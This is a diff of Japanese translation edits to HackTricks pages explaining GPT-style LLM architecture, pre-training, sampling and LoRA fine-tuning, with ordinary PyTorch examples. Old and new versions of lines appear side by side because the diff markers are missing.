2. **トークン埋め込みおよび位置埋め込みレイヤー**: トークン化されたテキストは、**トークン埋め込み**レイヤーと**位置埋め込みレイヤー**を通過し、シーケンス内のトークンの位置をキャプチャします。これは単語の順序を理解するために重要です。
3. **トランスフォーマーブロック**: モデルには**12のトランスフォーマーブロック**が含まれており、それぞれに複数のレイヤーがあります。これらのブロックは以下のシーケンスを繰り返します:
- **マスク付きマルチヘッドアテンション**: モデルが入力テキストの異なる部分に同時に焦点を合わせることを可能にします。
- **レイヤー正規化**: トレーニングを安定させ、改善するための正規化ステップです。
- **フィードフォワードレイヤー**: アテンションレイヤーからの情報を処理し、次のトークンについての予測を行う役割を担います。
- **ドロップアウトレイヤー**: これらのレイヤーは、トレーニング中にユニットをランダムにドロップすることで過学習を防ぎます。
3. **トランスフォーマーブロック**: モデルには**12のトランスフォーマーブロック**が含まれており、それぞれに複数のレイヤーがあります。これらのブロックは以下のシーケンスを繰り返します
- **マスク付きマルチヘッドアテンション**: モデルが入力テキストの異なる部分に同時に焦点を合わせることを可能にします。
- **レイヤー正規化**: トレーニングを安定させ、改善するための正規化ステップです。
- **フィードフォワードレイヤー**: アテンションレイヤーからの情報を処理し、次のトークンについての予測を行う役割を担います。
- **ドロップアウトレイヤー**: これらのレイヤーは、トレーニング中にユニットをランダムにドロップすることで過学習を防ぎます。
4. **最終出力レイヤー**: モデルは**4x50,257次元のテンソル**を出力します。ここで**50,257**は語彙のサイズを表します。このテンソルの各行は、モデルがシーケンス内の次の単語を予測するために使用するベクトルに対応します。
5. **目標**: 目的は、これらの埋め込みを取得し、再びテキストに変換することです。具体的には、出力の最後の行が次の単語を生成するために使用され、この図では「前方」として表されています。
5. **目標**: 目的は、これらの埋め込みを取、再びテキストに変換することです。具体的には、出力の最後の行が次の単語を生成するために使用され、この図では「forward」として表されています。
### コード表現
```python
@ -221,7 +223,7 @@ torch.sqrt(torch.tensor(2.0 / torch.pi)) *
### **フィードフォワードニューラルネットワーク**
_行列の形状をよりよく理解するために、形状がコメントとして追加されています:_
_形状は行列の形状をよりよく理解するためにコメントとして追加されています:_
```python
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
class FeedForward(nn.Module):
@ -247,10 +249,10 @@ return x # Output shape: (batch_size, seq_len, emb_dim)
- **層の詳細:**
- **最初の線形層:** 次元を `emb_dim` から `4 * emb_dim` に拡張します。
- **GELU活性化:** 非線形性を適用します。
- **二の線形層:** 次元を再び `emb_dim`戻します。
- **番目の線形層:** 次元を再び `emb_dim`減少させます。
> [!TIP]
> ご覧の通り、フィードフォワードネットワークは3層を使用しています。最初の層は線形層で、線形重みモデル内でトレーニングするパラメータを使用して次元を4倍にします。その後、GELU関数がすべての次元に適用され、より豊かな表現を捉えるための非線形変化が行われ、最後にもう一つの線形層が元の次元サイズに戻します。
> ご覧の通り、フィードフォワードネットワークは3層を使用しています。最初の層は線形層で、線形重みモデル内でトレーニングするパラメータを使用して次元を4倍にします。その後、GELU関数がすべての次元に適用され、より豊かな表現を捉えるための非線形変化が加えられ、最後に元の次元サイズに戻すために別の線形層が使用されます。
### **マルチヘッドアテンションメカニズム**
@ -261,17 +263,17 @@ return x # Output shape: (batch_size, seq_len, emb_dim)
- **マルチヘッド自己注意:** トークンをエンコードする際に、入力シーケンス内の異なる位置にモデルが焦点を合わせることを可能にします。
- **主要コンポーネント:**
- **クエリ、キー、値:** 入力の線形射影で、注意スコアを計算するために使用されます。
- **ヘッド:** 複数の注意メカニズムが並行して動作し`num_heads`)、それぞれが縮小された次元(`head_dim`)を持ちます。
- **ヘッド:** 複数の注意メカニズムが並行して実行されます`num_heads`)、それぞれが縮小された次元(`head_dim`)を持ちます。
- **注意スコア:** クエリとキーのドット積として計算され、スケーリングおよびマスキングされます。
- **マスキング:** 将来のトークンにモデルが注意を向けないように因果マスクが適用されますGPTのような自己回帰モデルにとって重要です
- **注意重み:** マスクされたスケーリングされた注意スコアのソフトマックス。
- **コンテキストベクトル:** 注意重みに従った値の加重和。
- **コンテキストベクター:** 注意重みに従った値の加重和。
- **出力射影:** すべてのヘッドの出力を組み合わせるための線形層。
> [!TIP]
> このネットワークの目標は、同じコンテキスト内のトークン間の関係を見つけることです。さらに、トークンは異なるヘッドに分割され、最終的に見つかった関係はこのネットワークの最後で結合されるため、過学習を防ぎます。
>
> さらに、トレーニング中に**因果マスク**が適用され、特定のトークンに対する関係を探る際に後のトークンが考慮されないようにし、**ドロップアウト**も適用されて**過学習を防ぎます**。
> さらに、トレーニング中に**因果マスク**が適用され、特定のトークンに対する関係を見ているときに後のトークンが考慮されないようにし、**ドロップアウト**も適用されて**過学習を防ぎます**。
### **層** 正規化
```python
@ -291,22 +293,22 @@ return self.scale * norm_x + self.shift
```
#### **目的と機能**
- **レイヤー正規化:** バッチ内の各個別例に対して、特徴(埋め込み次元)全体入力を正規化するために使用される技術。
- **レイヤー正規化:** バッチ内の各個別例に対して、特徴(埋め込み次元)全体入力を正規化するために使用される技術。
- **コンポーネント:**
- **`eps`:** 正規化中のゼロ除算を防ぐために分散に追加される小さな定数(`1e-5`)。
- **`scale``shift`:** 正規化された出力をスケールおよびシフトするためにモデルが学習可能なパラメータ(`nn.Parameter`。それぞれ1と0で初期化される。
- **`scale``shift`:** 正規化された出力をスケールおよびシフトするため学習可能なパラメータ(`nn.Parameter`。それぞれ1と0で初期化される。
- **正規化プロセス:**
- **平均の計算(`mean`:** 埋め込み次元(`dim=-1`全体で入力 `x` の平均を計算し、ブロードキャストのために次元を保持する(`keepdim=True`)。
- **分散の計算(`var`:** 埋め込み次元全体で `x` の分散を計算し、同様に次元を保持する。`unbiased=False` パラメータは、分散がバイアス推定量を使用して計算されることを保証する(`N-1` ではなく `N` で割る)。これは、サンプルではなく特徴に対して正規化する際に適切である。
- **平均の計算(`mean`:** 埋め込み次元(`dim=-1`に沿った入力 `x` の平均を計算し、ブロードキャストのために次元を保持する(`keepdim=True`)。
- **分散の計算(`var`:** 埋め込み次元に沿った `x` の分散を計算し、同様に次元を保持する。`unbiased=False` パラメータは、バイアス推定量を使用して分散が計算されることを保証する(`N` で割る代わりに `N-1` で割る)。これは、サンプルではなく特徴に対して正規化する際に適切である。
- **正規化(`norm_x`:** `x` から平均を引き、分散に `eps` を加えた平方根で割る。
- **スケールとシフト:** 正規化された出力に学習可能な `scale``shift` パラメータを適用する。
> [!TIP]
> 目標は、同じトークンのすべての次元平均0、分散1を確保することです。これにより、**深層ニューラルネットワークのトレーニングを安定させる**ことが目的であり、これはトレーニング中のパラメータの更新によるネットワークの活性化の分布の変化を指す内部共変量シフトを減少させることに関連しています。
> 目標は、同じトークンのすべての次元にわたって平均0、分散1を確保することです。これにより、**深層ニューラルネットワークのトレーニングを安定させる**ことが目的であり、これはトレーニング中のパラメータの更新によるネットワークの活性化の分布の変化を指す内部共変量シフトを減少させることに関連しています。
### **トランスフォーマーブロック**
_形状を理解するために、行列の形状にコメントが追加されています:_
_行列の形状をよりよく理解するために、コメントとして形状が追加されています:_
```python
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
@ -348,25 +350,25 @@ return x # Output shape: (batch_size, seq_len, emb_dim)
```
#### **目的と機能**
- **レイヤーの構成:** マルチヘッドアテンション、フィードフォワードネットワーク、レイヤーノーマライゼーション、および残差接続を組み合わせます
- **レイヤーノーマライゼーション:** 安定したトレーニングのために、アテンションおよびフィードフォワードレイヤーの前に適用されます
- **残差接続(ショートカット):** レイヤーの入力を出力に加えて勾配の流れを改善し、深いネットワークのトレーニングを可能にします。
- **ドロップアウト:** 正則化のために、アテンションおよびフィードフォワードレイヤーの後に適用されます
- **レイヤーの構成:** マルチヘッドアテンション、フィードフォワードネットワーク、レイヤーノーマライゼーション、残差接続を組み合わせる
- **レイヤーノーマライゼーション:** 安定したトレーニングのためにアテンションとフィードフォワードレイヤーの前に適用される
- **残差接続(ショートカット):** レイヤーの入力を出力に加えて勾配の流れを改善し、深いネットワークのトレーニングを可能にす
- **ドロップアウト:** 正則化のためにアテンションとフィードフォワードレイヤーの後に適用される
#### **ステップバイステップの機能**
1. **最初の残差パス(自己アテンション):**
- **入力(`shortcut`:** 残差接続のために元の入力を保存します。
- **レイヤーノーム(`norm1`:** 入力を正規化します。
- **マルチヘッドアテンション(`att`:** 自己アテンションを適用します。
- **ドロップアウト(`drop_shortcut`:** 正則化のためにドロップアウトを適用します。
- **残差を加える(`x + shortcut`:** 元の入力と組み合わせます
- **入力(`shortcut`:** 残差接続のために元の入力を保存す
- **レイヤーノーム(`norm1`:** 入力を正規化す
- **マルチヘッドアテンション(`att`:** 自己アテンションを適用す
- **ドロップアウト(`drop_shortcut`:** 正則化のためにドロップアウトを適用す
- **残差を加える(`x + shortcut`:** 元の入力と組み合わせ
2. **2番目の残差パスフィードフォワード:**
- **入力(`shortcut`:** 次の残差接続のために更新された入力を保存します。
- **レイヤーノーム(`norm2`:** 入力を正規化します。
- **フィードフォワードネットワーク(`ff`:** フィードフォワード変換を適用します。
- **ドロップアウト(`drop_shortcut`:** ドロップアウトを適用します。
- **残差を加える(`x + shortcut`:** 最初の残差パスからの入力と組み合わせます
- **入力(`shortcut`:** 次の残差接続のために更新された入力を保存す
- **レイヤーノーム(`norm2`:** 入力を正規化す
- **フィードフォワードネットワーク(`ff`:** フィードフォワード変換を適用す
- **ドロップアウト(`drop_shortcut`:** ドロップアウトを適用す
- **残差を加える(`x + shortcut`:** 最初の残差パスからの入力と組み合わせ
> [!TIP]
> トランスフォーマーブロックはすべてのネットワークをグループ化し、トレーニングの安定性と結果を改善するためにいくつかの**正規化**と**ドロップアウト**を適用します。\
@ -444,7 +446,7 @@ return logits # Output shape: (batch_size, seq_len, vocab_size)
> [!TIP]
> このクラスの目的は、**シーケンス内の次のトークンを予測する**ために、他のすべてのネットワークを使用することです。これはテキスト生成のようなタスクにとって基本的です。
>
> 指定された数のトランスフォーマーブロックを**使用する**ことに注意してください。また、各トランスフォーマーブロックは1つのマルチヘッドアテンションネット、1つのフィードフォワードネット、およびいくつかの正規化を使用しています。したがって、12のトランスフォーマーブロックが使用される場合は、これを12倍します。
> 指定された数のトランスフォーマーブロックを**使用する**ことに注意してください。また、各トランスフォーマーブロックは1つのマルチヘッドアテンションネット、1つのフィードフォワードネット、およびいくつかの正規化を使用しています。したがって、12のトランスフォーマーブロックが使用される場合は、これを12倍します。
>
> さらに、**出力**の**前に**正規化層が追加され、最後に適切な次元で結果を得るために最終線形層が適用されます。各最終ベクトルが使用される語彙のサイズを持つことに注意してください。これは、語彙内の可能なトークンごとに確率を得ようとしているためです。
@ -570,14 +572,14 @@ layer_norm_params_per_block = 2 * (2 * emb_dim) = 2 * 768 * 2 = 3,072
pythonCopy codeparams_per_block = mha_params + ff_params + layer_norm_params_per_block
params_per_block = 2,360,064 + 4,722,432 + 3,072 = 7,085,568
```
**すべてのトランスフォーマーブロックのパラメータ**
**すべてのトランスフォーマーブロックの合計パラメータ**
```python
pythonCopy codetotal_transformer_blocks_params = params_per_block * n_layers
total_transformer_blocks_params = 7,085,568 * 12 = 85,026,816
```
#### **3. 最終層**
**a. 最終層正規化**
**a. 最終層正規化**
- **パラメータ:** `2 * emb_dim` (スケールとシフト)
```python
@ -590,7 +592,7 @@ pythonCopy codefinal_layer_norm_params = 2 * 768 = 1,536
```python
pythonCopy codeoutput_projection_params = 768 * 50257 = 38,597,376
```
#### **4. すべてのパラメータの要約**
#### **4. すべてのパラメータの総括**
```python
pythonCopy codetotal_params = (
embedding_params +
@ -608,7 +610,7 @@ total_params = 163,009,536
```
## テキスト生成
前のトークンのように次のトークンを予測するモデルがあれば、出力から最後のトークンの値を取得するだけで済みます(それが予測されたトークンの値になります)。これは**語彙内の各エントリごとの値**となり、次に`softmax`関数を使用して次元を確率に正規化し、合計が1になるようにし、最大のエントリのインデックスを取得します。これが語彙内の単語のインデックスになります。
前のトークンのように次のトークンを予測するモデルがあれば、出力から最後のトークンの値を取得するだけで済みます(それが予測されたトークンの値になります)。これは**語彙内の各エントリごとの値**となり、次に`softmax`関数を使用して次元を正規化し、合計が1になる確率に変換します。そして、最大のエントリのインデックスを取得します。これが語彙内の単語のインデックスになります。
コードは[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb)からです。
```python
@ -664,3 +666,6 @@ print("Output length:", len(out[0]))
## 参考文献
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

41
src/AI/AI-llm-architecture/6.-pre-training-and-loading-models.md
View File

@ -1,10 +1,12 @@
# 6. プレトレーニングとモデルの読み込み
# 6. プレトレーニングとモデルのロード
{{#include /banners/hacktricks-training.md}}
## テキスト生成
モデルをトレーニングするためには、そのモデルが新しいトークンを生成できる必要があります。次に、生成されたトークンを期待されるトークンと比較し、モデルが**生成する必要のあるトークンを学習する**ようにトレーニングします。
前の例のように、すでにいくつかのトークンを予測しているため、その関数をこの目的のために再利用することが可能です。
前の例でいくつかのトークンを予測したので、その関数をこの目的のために再利用することが可能です。
> [!TIP]
> この第六段階の目標は非常にシンプルです:**モデルをゼロからトレーニングする**。これには、定義された損失関数とオプティマイザーを使用してデータセットをループし、モデルのすべてのパラメータをトレーニングするために、前のLLMアーキテクチャが使用されます。
@ -13,17 +15,17 @@
正しいトレーニングを行うためには、期待されるトークンに対して得られた予測を測定する必要があります。トレーニングの目標は、正しいトークンの可能性を最大化することであり、これは他のトークンに対するその確率を増加させることを含みます。
正しいトークンの確率を最大化するためには、モデルの重みを修正してその確率が最大化される必要があります。重みの更新は**バックプロパゲーション**を介して行われます。これには**最大化する損失関数**が必要です。この場合、関数は**行われた予測と望ましいものとの違い**になります。
正しいトークンの確率を最大化するためには、モデルの重みを修正してその確率が最大化される必要があります。重みの更新は**バックプロパゲーション**を介して行われます。これには**最大化する損失関数**が必要です。この場合、関数は**実行された予測と望ましいものとの違い**になります。
ただし、生の予測で作業するのではなく、底がnの対数で作業します。したがって、期待されるトークンの現在の予測が7.4541e-05であった場合、**7.4541e-05**の自然対数(底*e*)は約**-9.5042**です。\
次に、例えばコンテキストが5トークンの各エントリについて、モデルは5トークンを予測する必要があり、最初の4トークンは入力の最後のものであり、5番目が予測されたものです。したがって、その場合、各エントリには5つの予測があり最初の4つが入力にあったとしても、モデルはこれを知りません、したがって5つの期待されるトークンと5つの確率を最大化する必要があります。
次に、例えばコンテキスト長が5トークンの各エントリについて、モデルは5つのトークンを予測する必要があり、最初の4つのトークンは入力の最後のものであり、5つ目が予測されたものです。したがって、その場合、各エントリについて5つの予測が得られます最初の4つが入力にあったとしても、モデルはこれを知りませんので、5つの期待されるトークンがあり、したがって最大化する必要がある5つの確率があります。
したがって、各予測に自然対数を適用した後、**平均**が計算され、**マイナス記号が削除され**これを_クロスエントロピー損失_と呼びます、それが**できるだけ0に近づけるべき数**です。なぜなら、1の自然対数は0だからです
したがって、各予測に自然対数を適用した後、**平均**が計算され、**マイナス記号が取り除かれ**これを_クロスエントロピー損失_と呼びます、それが**できるだけ0に近づけるべき数**です。なぜなら、1の自然対数は0だからです
<figure><img src="../../images/image (10) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233">https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233</a></p></figcaption></figure>
モデルの良さを測定する別の方法は、パープレキシティと呼ばれます。**パープレキシティ**は、確率モデルがサンプルをどれだけうまく予測するかを評価するために使用される指標です。言語モデルでは、次のトークンをシーケンスで予測する際の**モデルの不確実性**を表します。\
例えば、48725のパープレキシティ値は、トークンを予測する必要があるときに、語彙の中で48,725のトークンのどれが良いのか不確かであることを意味します。
モデルの良さを測定する別の方法は、パープレキシティと呼ばれます。**パープレキシティ**は、確率モデルがサンプルを予測する能力を評価するために使用される指標です。言語モデルでは、次のトークンをシーケンスで予測する際の**モデルの不確実性**を表します。\
例えば、48725のパープレキシティ値は、トークンを予測する必要があるときに、語彙の中の48,725トークンのどれが良いのか不確かであることを意味します。
## プレトレインの例
@ -527,7 +529,7 @@ torch.save({
```
### テキスト <--> ID 変換のための関数
これらは、語彙からテキストを ID に変換し、その逆を行うために使用できるいくつかの簡単な関数です。これは、テキストの処理の最初と予測の最後に必要です。
これらは、語彙からテキストをIDに変換し、その逆を行うために使用できるいくつかのシンプルな関数です。これは、テキストの処理の最初と予測の最後に必要です。
```python
# Functions to transform from tokens to ids and from to ids to tokens
def text_to_token_ids(text, tokenizer):
@ -547,8 +549,8 @@ return tokenizer.decode(flat.tolist())
- **`top-k`**は、上位kトークンを除くすべてのトークンの確率を`-inf`に減少させることを意味します。したがって、k=3の場合、決定を下す前に、最も可能性の高い3つのトークンのみが`-inf`以外の確率を持ちます。
- **`temperature`**は、すべての確率を温度値で割ることを意味します。値が`0.1`の場合、最も高い確率が最も低い確率と比較して改善されますが、例えば温度が`5`の場合は、より平坦になります。これは、LLMに持たせたい応答の変動を改善するのに役立ちます。
- 温度を適用した後、**`softmax`**関数が再度適用され、残りのトークンが合計確率1になるようにします。
- 最後に、最も高い確率のトークンを選択するのではなく、関数**`multinomial`**が適用されて**最終的な確率に基づいて次のトークンを予測**します。したがって、トークン1が70%の確率、トークン2が20%、トークン3が10%の場合、70%の確率でトークン1が選択され、20%の確率でトークン2が選択され、10%の確率でトークン3が選択されます。
- 温度を適用した後、**`softmax`**関数が再度適用され、残りのすべてのトークンが合計確率1を持つようになります。
- 最後に、最も高い確率のトークンを選択するのではなく、関数**`multinomial`**が適用されて**最終確率に基づいて次のトークンを予測します**。したがって、トークン1が70%の確率を持ち、トークン2が20%、トークン3が10%の場合、70%の確率でトークン1が選択され、20%の確率でトークン2が選択され、10%の確率でトークン3が選択されます。
```python
# Generate text function
def generate_text(model, idx, max_new_tokens, context_size, temperature=0.0, top_k=None, eos_id=None):
@ -590,9 +592,9 @@ idx = torch.cat((idx, idx_next), dim=1) # (batch_size, num_tokens+1)
return idx
```
> [!TIP]
> `top-k`の一般的な代替手段として[**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling)があります。これは、最も確率の高いkサンプルを取得するのではなく、すべての結果の**語彙**を確率で**整理**し、最も高い確率から最も低い確率まで**合計**して**閾値に達するまで**続けます。
> `top-k`の一般的な代替手段として[**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling)があります。これは、最も確率の高いkサンプルを取得するのではなく、すべての結果の**語彙**を確率で**整理**し、最も高い確率から最も低い確率まで**合計**して**閾値に達するまで**続けます。
>
> その後、**語彙の中で**相対的な確率に応じて**のみ**考慮される単語が選ばれます。
> その後、**語彙の中で**相対的な確率に応じて**のみ**考慮される単語になります。
>
> これにより、各ケースで最適なkが異なる可能性があるため、`k`サンプルの数を選択する必要がなく、**閾値のみ**を選択すればよくなります。
>
@ -600,7 +602,7 @@ return idx
> [!TIP]
> 生成されたテキストを改善する別の方法は、この例で使用されている貪欲探索の代わりに**ビームサーチ**を使用することです。\
> 貪欲探索とは異なり、各ステップで最も確率の高い次の単語を選択し単一のシーケンスを構築するのではなく、**ビームサーチは各ステップで最もスコアの高い𝑘 kの部分シーケンス**(「ビーム」と呼ばれる)を追跡します。複数の可能性を同時に探索することで、効率と品質のバランスを取り、貪欲なアプローチによる早期の最適でない選択によって見逃される可能性のある**より良い全体の**シーケンスを見つけるチャンスを増やします。
> 貪欲探索とは異なり、各ステップで最も確率の高い次の単語を選択し単一のシーケンスを構築するのではなく、**ビームサーチは各ステップで最もスコアの高い𝑘 kの部分シーケンス**(「ビーム」と呼ばれる)を追跡します。複数の可能性を同時に探索することで、効率と品質のバランスを取り、貪欲なアプローチによる早期の最適でない選択によって見逃される可能性のある**より良い全体の**シーケンスを見つけるチャンスを増やします。
>
> _この改善は前のコードには含まれていないことに注意してください。_
@ -635,7 +637,7 @@ break
return total_loss / num_batches
```
> [!TIP]
> **勾配クリッピング**は、**トレーニングの安定性**を向上させるために、大規模なニューラルネットワークで使用される技術で、勾配の大きさに対して**最大閾値**を設定します。勾配がこの事前定義された`max_norm`を超えると、モデルのパラメータへの更新が管理可能な範囲内に収まるように比例してスケールダウンされ、勾配爆発のような問題を防ぎ、より制御された安定したトレーニングを確保します。
> **勾配クリッピング**は、**トレーニングの安定性**を向上させるために、大規模なニューラルネットワークで使用される技術で、勾配の大きさに対して**最大閾値**を設定します。勾配がこの事前定義された`max_norm`を超えると、モデルのパラメータへの更新が管理可能な範囲内に収まるように比例してスケーリングされ、勾配爆発のような問題を防ぎ、より制御された安定したトレーニングを確保します。
>
> _この改善は前のコードには含まれていないことに注意してください。_
>
@ -651,7 +653,7 @@ return total_loss / num_batches
データセットの一部は、モデルのパフォーマンスをより良く評価するためにテストセットのために残されることもあります。
両方のデータローダーは、同じバッチサイズ、最大長、ストライド、ワーカー数この場合は0を使用しています。\
主な違いは、各データで使用されるデータと、検証者が最後のデータをドロップせず、検証目的に必要ないためデータをシャッフルしないことです。
主な違いは、各データローダーで使用されるデータと、検証者が最後のデータをドロップせず、検証目的に必要ないためデータをシャッフルしないことです。
また、**ストライドがコンテキストの長さと同じ大きさである**という事実は、データをトレーニングするために使用されるコンテキスト間に重複がないことを意味します(過剰適合を減少させますが、トレーニングデータセットも減少させます)。
@ -686,7 +688,7 @@ num_workers=0
```
## サニティチェック
目的は、トレーニングに十分なトークンがあるか、形状が期待通りであるかを確認し、トレーニングおよび検証に使用されるトークンの数に関する情報を得ることです:
目的は、トレーニングに十分なトークンがあるか、形状が期待通りであるかを確認し、トレーニング検証に使用されるトークンの数に関する情報をることです:
```python
# Sanity checks
if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
@ -759,7 +761,7 @@ print("Validation loss:", val_loss)
- トレーニング中に使用する**オプティマイザー**:これは勾配を使用し、ロスを減少させるためにパラメータを更新する関数です。この場合、見ての通り `AdamW` が使用されますが、他にも多くのものがあります。
- `optimizer.zero_grad()` は、勾配を蓄積しないように各ラウンドでリセットするために呼び出されます。
- **`lr`** パラメータは **学習率** で、モデルのパラメータを更新する際の最適化プロセス中に取られる **ステップのサイズ** を決定します。**小さい** 学習率は、オプティマイザーが重みを **小さく更新** することを意味し、より **正確な** 収束をもたらす可能性がありますが、トレーニングが **遅くなる** 可能性があります。**大きい** 学習率はトレーニングを加速できますが、ロス関数の最小値を **オーバーシュートする** リスクがあります(ロス関数が最小化される点を **飛び越える**)。
- **ウェイトデケイ** は、重みが大きいことにペナルティを与える追加の項を加えることで **ロス計算** ステップを修正します。これにより、オプティマイザーはデータにうまくフィットしつつ、モデルをシンプルに保ち、機械学習モデルのオーバーフィッティングを防ぐために、特定の特徴に過度の重要性を与えないようにします。
- **ウェイトデケイ** は、重みが大きいことにペナルティを与える追加の項を加えることで **ロス計算** ステップを修正します。これにより、オプティマイザーはデータにうまくフィットしつつ、モデルをシンプルに保ち、機械学習モデルのオーバーフィッティングを防ぐために、特定の特徴に過度の重要性を与えないようにします。
- SGDのような従来のオプティマイザーは、L2正則化とともにウェイトデケイをロス関数の勾配と結びつけます。しかし、**AdamW**Adamオプティマイザーの変種は、ウェイトデケイを勾配更新から切り離し、より効果的な正則化を実現します。
- トレーニングに使用するデバイス
- エポック数:トレーニングデータを何回通過するか
@ -831,7 +833,7 @@ model.train() # Back to training model applying all the configurations
> 学習率を改善するために、**線形ウォームアップ**と**コサイン減衰**と呼ばれるいくつかの関連技術があります。
>
> **線形ウォームアップ**は、初期学習率と最大学習率を定義し、各エポックの後に一貫して更新することです。これは、より小さな重みの更新でトレーニングを開始することで、モデルがトレーニングフェーズ中に大きく不安定な更新に遭遇するリスクを減少させるためです。\
> **コサイン減衰**は、**ウォームアップ**フェーズの後に半コサイン曲線に従って**学習率を徐々に減少させる**技術であり、重みの更新を遅くして**損失の最小値をオーバーシュートするリスクを最小限に抑え**、後のフェーズでのトレーニングの安定性を確保します。
> **コサイン減衰**は、**ウォームアップ**フェーズの後に半コサイン曲線に従って学習率を**徐々に減少させる**技術であり、重みの更新を遅くして**損失の最小値を超えるリスクを最小限に抑え**、後のフェーズでのトレーニングの安定性を確保します。
>
> _これらの改善は前のコードには含まれていないことに注意してください。_
@ -939,3 +941,6 @@ GPT2の重みをローカルに読み込むための2つの簡単なスクリプ
## 参考文献
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

18
src/AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md
View File

@ -1,22 +1,24 @@
# 7.0. LoRAのファインチューニングにおける改善
# 7.0. LoRAの微調整における改善
{{#include /banners/hacktricks-training.md}}
## LoRAの改善
> [!TIP]
> **LoRAを使用することで、ファインチューニングに必要な計算が大幅に削減されます**。
> **LoRAを使用することで、微調整に必要な計算が大幅に削減されます**。
LoRAは、モデルの**小さな部分**のみを変更することで、**大規模モデル**を効率的にファインチューニングすることを可能にします。これにより、トレーニングに必要なパラメータの数が減り、**メモリ**と**計算リソース**が節約されます。これは以下の理由によります:
LoRAは、モデルの**小さな部分**のみを変更することで、**大規模モデル**を効率的に微調整することを可能にします。これにより、トレーニングに必要なパラメータの数が減り、**メモリ**と**計算リソース**を節約できます。これは以下の理由によります:
1. **トレーニング可能なパラメータの数を削減**: モデル内の全体の重み行列を更新する代わりに、LoRAは重み行列を2つの小さな行列**A**と**B**)に**分割**します。これにより、トレーニングが**速く**なり、更新する必要のあるパラメータが少ないため、**メモリ**も**少なく**て済みます。
1. **トレーニング可能なパラメータの数を削減**: モデル内の全体の重み行列を更新する代わりに、LoRAは重み行列を2つの小さな行列**A**と**B**と呼ばれる)に**分割**します。これにより、トレーニングが**速く**なり、更新する必要のあるパラメータが少ないため、**メモリ**も**少なく**て済みます。
1. これは、レイヤー行列の完全な重み更新を計算する代わりに、2つの小さな行列の積に近似するため、計算する更新が減少するからです\
<figure><img src="../../images/image (9) (1).png" alt=""><figcaption></figcaption></figure>
2. **元のモデルの重みを変更しない**: LoRAを使用すると、元のモデルの重みをそのままにしておき、**新しい小さな行列**AとBだけを更新できます。これは、モデルの元の知識が保持され、必要な部分だけを調整することを意味するため、便利です。
3. **効率的なタスク特化型ファインチューニング**: モデルを**新しいタスク**に適応させたい場合、モデルの残りの部分をそのままにしておき、**小さなLoRA行列**AとBだけをトレーニングすればよいです。これは、モデル全体を再トレーニングするよりも**はるかに効率的**です。
4. **ストレージ効率**: ファインチューニング後、各タスクのために**新しいモデル全体**を保存する代わりに、**LoRA行列**だけを保存すればよく、これはモデル全体に比べて非常に小さいです。これにより、多くのタスクにモデルを適応させる際に、過剰なストレージを使用せずに済みます。
3. **効率的なタスク特化型微調整**: モデルを**新しいタスク**に適応させたい場合、モデルの残りの部分をそのままにしておき、**小さなLoRA行列**AとBだけをトレーニングすればよいです。これは、モデル全体を再トレーニングするよりも**はるかに効率的**です。
4. **ストレージ効率**: 微調整後、各タスクのために**新しいモデル全体**を保存する代わりに、**LoRA行列**だけを保存すればよく、これはモデル全体に比べて非常に小さいです。これにより、多くのタスクにモデルを適応させる際に、過剰なストレージを使用せずに済みます。
ファインチューニング中にLinearの代わりにLoraLayersを実装するために、ここで提案されているコードがあります [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):
微調整中にLinearの代わりにLoraLayersを実装するために、ここに提案されたコードがあります [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):
```python
import math
@ -58,3 +60,5 @@ replace_linear_with_lora(module, rank, alpha)
## 参考文献
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

18
src/AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md
View File

@ -1,5 +1,7 @@
# 7.1. Fine-Tuning for Classification
{{#include /banners/hacktricks-training.md}}
## What is
ファインチューニングは、膨大なデータから一般的な言語パターンを学習した**事前学習済みモデル**を取り、それを**特定のタスク**を実行するためやドメイン特有の言語を理解するために**適応させる**プロセスです。これは、モデルのトレーニングを小さなタスク特化型データセットで続けることによって達成され、新しいデータのニュアンスにより適したパラメータに調整しながら、すでに取得した広範な知識を活用します。ファインチューニングにより、モデルは新しいモデルをゼロからトレーニングすることなく、専門的なアプリケーションでより正確で関連性のある結果を提供できるようになります。
@ -14,23 +16,23 @@
### Data set size
もちろん、モデルをファインチューニングするには、LLMを専門化するために使用する構造化データが必要です。[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb)で提案された例では、GPT2は、[https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip](https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip)のデータを使用して、メールがスパムかどうかを検出するようにファインチューニングされています。
